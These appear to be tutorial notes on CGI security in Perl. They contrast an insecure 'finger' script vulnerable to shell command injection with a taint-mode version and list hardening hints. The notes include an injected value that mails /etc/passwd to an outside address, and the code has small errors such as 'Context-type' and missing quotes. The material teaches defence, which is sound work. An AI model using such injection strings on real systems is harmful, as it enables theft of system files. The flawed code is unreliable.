CGI - Security

Stephen M. Williams

CGI Programs send system output to client.

PERL, Shell, etc. can make system calls.

Unfiltered input can compromise security.

Example (insecure) PERL script for "finger" on the WWW

#!/usr/local/bin/perl
require "cgi-lib.pl";
&ReadParse(*input); #query is sent w/ FORM action
# $query = $ENV{'QUERY_STRING'}; #query is sent w/ GET action
print "Context-type:text/html\n\n"; # http header...REQUIRED
print "<HTML><HEAD><TITLE>Finger Script</TITLE>";
print "</HEAD>\n<BODY>\n<PRE>\n";
$fin_out = `finger $input{usernames}`;
print "$fin_out\n</PRE>\n</BODY></HTML>;

This code uses "tainted" variables in system calls:

If a client sends "smith Andrews ali ", the URL will return the "finger" output for each of these users.

If a client sends "smith; mail me@whereever.org </etc/passwd", the URL will return the output from "finger smith" and will mail the contents of the system password file.

Variables containing characters like ";" and "`" are called tainted.

Secure PERL script

#!/usr/local/bin/perl -T
require "cgi-lib.pl";
&ReadParse(*input); #query is sent w/ FORM action
# $query = $ENV{'QUERY_STRING'}; #query is sent w/ GET action
print "Context-type:text/html\n\n"; # http header...REQUIRED
print "<HTML><HEAD><TITLE>Finger Script</TITLE>";
print "</HEAD>\n<BODY>\n<PRE>\n";
$input{usernames} =~ /^([\w.]*)$/; #untaint
$fin_out = $1;
$out_line = `finger $fin_out`;
print "$out_line\n</PRE>\n</BODY></HTML>;

Use of "taintperl" disallows certain actions.

Script cannot use variables derived from user input as input to system calls or file manipulation unless it has been "untainted".

Path must be specified within script if outside current directory...or explicit in file opens.

Hints for Secure CGI Programming

Screen inbound clients on domain name if applicable.

Do not use shell scripts at all.

Use "perl -T" or "taintperl" if system calls will be made.
Minimize use of system calls.
Screen out undesirable input characters with "~ tr/^[\w ]//g" or "$x =~ /^([\w.]*)$/;".
If applicable, screen input on dictionary.
Non-text input (e.g., buttons/selectors) should also be checked.

References:

Wall,Larry and Randal L. Schwartz, "Programming PERL", O'Reilly & Associates, © 1991, pp. 258,374-375 ...(the Camel Book).
Stein, Lincoln "The WWW Security FAQ"....and the Chapter on Safe PERL scripts.